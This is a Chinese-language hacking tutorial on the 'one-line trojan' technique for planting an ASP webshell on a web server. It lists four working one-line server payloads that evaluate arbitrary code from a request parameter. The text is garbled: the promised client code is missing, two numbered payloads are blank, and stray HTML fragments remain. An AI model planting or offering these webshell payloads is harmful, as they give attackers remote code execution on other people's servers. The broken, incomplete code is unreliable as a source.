文章作者:冷月孤枫
备注:QQ:89224874 个人主页: http://fker.8866.org/
转载请保留信息的完整性
所谓一句话插马,就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。它分为一句话asp马、一句话php马……,本文就一句话asp木马来做一次详尽的剖析。在此首先要感谢前辈们的探究!
一:基础篇
首先我们看一下最常用的一句话木马客户端的代码
一句话客户端
|
|
|
提供六个服务端:
1. <%eval request("fk")%>
2. <%execute request("fk")%>
3. <%execute(request("fk"))%>
4. <%On Error Resume Next%><%eval request("fk")%>
5.
6.
By 冷月孤枫 枫客:http://fker.8866.org/ ... t;/font>
|
把上面的代码另存为htm的格式后就可以使用了,具体的使用说明在网页上可以看到
下面就带着大家一起分析一下上面的代码(html的一些最基本的知识就不做解释了):
一句话客户端 显示在浏览器标题栏上面的文字,你可以自己更改